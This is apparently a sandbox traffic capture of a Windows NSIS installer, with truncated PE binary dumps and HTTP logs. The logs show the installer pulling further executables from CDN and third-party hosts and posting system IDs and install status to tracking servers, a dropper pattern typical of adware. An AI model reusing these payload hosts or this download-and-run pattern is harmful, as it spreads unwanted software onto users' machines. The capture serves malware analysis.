MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@..........................p............@..................................s....... ..pB...........S..8............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...pB... ...D...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....7B..H.P.u..u..u....r@..B...SV.5.7B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h./B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$..(7B...Si.....VW.T.....tO.q.3.;5,7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003040&browserver=106&country=UA&event=3&rnd=9035 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446793110.dop014.fr7.t,1446793110.cds054.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 06 Nov 2015 06:58:30 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1446793110.dop014.fr7.t,1446793110.cds054.fr7.c..GIF89a.............,...........D..;..
GET /crossbrowse/ie/106/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:30 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=72683
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793110.cds072.fr7.c
./..:S.p}...E.%C...Z#.e(..4z..i8..7..=.U."G.}.(Z.q.kR...%..M....d.&.F..).'|mZ"K...@....&.._.[...jK..I8..g.-.V.U....#...K.M@..z).b.W,O.jUny\.ty...uU6......a%....O..~......W.)U.dG>TU.vw^..*..?..A.Zz.....C.....@...-...3.:)XqWM.3\..7.....H.*...Ja.F.....A....m..'......N...K._.b... .'M.fD..y....Z..}'!SS.l..r.l.&rf...$/....`X....<0.^.J..N .tJ)<^...]...|Zd`2=.$t.d...Tm..wI.W.U....:.va...Mz0/.:.....%M.....'O._...6....._....dW..b/....v....T'..}...b.aJ...P.N...j.{.."H.....D4.....-7...E.....[..R{bz..L*.m2]...J.."1. DT....._.t.A.4......Z....?..I.I........Q...."....m,eNO...h..8s..i,..8n....t/<.......j9.rK....>.px.........^".j^.c......<.*X7..b..g..."..Na..:3..sj.j.Pk....;\...e.......f......."...#...*|%zB.O...&.....5n7..6..v..2.k<N*>N...9..L..F........T ....\..jS...%R..m:Fke.d.....d.......g.s...H......t....O3....u]..Q!.r....D.*@......$*.5\7.4i|...1.....s....k.a.Y..@.....U..........(...6...7{.i.|[.Do!..)..?...W\.m...*.~....r.... E3<..%0)Au...f..T.*.<n....bK tf.'P............e......d... .V...}.a.QE.pn-x.B......R....h.Q.W,.$......H,...*...XP..D...:\.ngJ..0~3.. j.....,.m.....H........b{..G.m......>.:.....?.....y......]......8h.N.....@.>..M^.p..c6.&.?x.T.oI.=......{ua..)....9V...2.2..<P.t<.I....'~..3.n]......u....tn...q....h. ...Kg.._...#...:.....-=...m.7..T...v........Kh.ti.n.oc.xP..1=(........47...............X.Vo:.K....?.V....z ...0Z.e].6F...Q.#.7r7....j....Tb..o..k8t.Z#....GXiZ.._...(.....-.(..Y.ew..[4... ... ..d..l..).m.FQ.MU..=.@....*.........P.'...(C......{.....u.W..$..3A..... ...<
<<< skipped >>>
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 43212
Connection: keep-alive
Date: Thu, 05 Nov 2015 15:06:07 GMT
Last-Modified: Thu, 05 Nov 2015 15:00:52 GMT
ETag: "d827c232ea17f09532bc7d73cc6cf44e"
Accept-Ranges: bytes
Server: AmazonS3
Age: 57139
X-Cache: Hit from cloudfront
Via: 1.1 c77b51ad135b3319a54e2e40de778962.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RBauuL7YsSsuQckizFNs9VblxdP9IW1JdXXcpzFc5Hm4LIP991Y_Lg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x...x...x.......z...x...........i...,...t.......y...Richx...................PE..L......K.................\....9......0.......p....@..........................PE..............................................s.......@E..............................................................................p...............................text...,Z.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc........@E......v..............@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....&z..H.P.u..u..u...Hr@..B...SV.5.&z..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..z.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...&z...Si.....VW.T.....tO.q.3.;5.&z.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.&z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 121
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:24 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:25 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:25 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:26 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:26 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:26 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 185
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 198
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:27 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 173
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:29 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:29 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:29 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:29 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:30 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:30 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:30 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:45 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 159
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://cdn-14b7.kxcdn.com/Cdn.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 172
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://cdn-14b7.kxcdn.com/Cdn.exe&errorlevel=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:50 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 06 Nov 2015 06:58:50 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:24 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 16:16:55 GMT
Connection: keep-alive
ETag: "55561bf7-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=afa23776af58eb1f539dab5af33ea66d&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=6FE5DDD064E91F40D31A83BB9FE8886E&sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&te=1446793133&ts=1446793133&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsq1C.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 06 Nov 2015 06:58:47 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:50 GMT
Content-Type: application/octet-stream
Content-Length: 61745
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=CZPOAqqx9
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata... ...............................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=81620
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793111.cds040.fr7.c
.p.w..n..{j..Z.\r/%..#k(. .~.N*.....uo...,.....].ys.....=.VS..u..'..a...>...0>.`X.E ..Lm.#SY....t.AZ..S&..L..?...4..k.scM}.|j.f.V.%Tw...........S...m%......(.^l@..n)....1....g.!.|......2V]N.. .Yj..k~:.mAb..5u.E......p..._.K ..h...9..pil......7f%.......T...../.....yh....R..xi..".T....YyQ^V..T..l.?.S]....R.....j.!....H.q.V.j..X....K..l7..s.SV.,.D........:.......-...`\O.......E_..j.&......6.o....)M...6......i,7......a.).F...k9....J !.....K.q6.O.6.#}c..-.zo6..".....TtoK...e.w..7$[&).cJ/......h..'2:....,...>....5.....l...~.........Pjd..OJ[....$i}.bw..*[~.`...".P......`...Uv/v...E..'.0=&.#.5H*y.V>..>....m.#...P..P:.$.OO.....l"..V...lLX.R>y.*..f..'.5......F>a.h..W)...B.l...s..J........n.}.....o.1.M...V..Y.:.@.Z.^"...*$..^.[.m..?...). 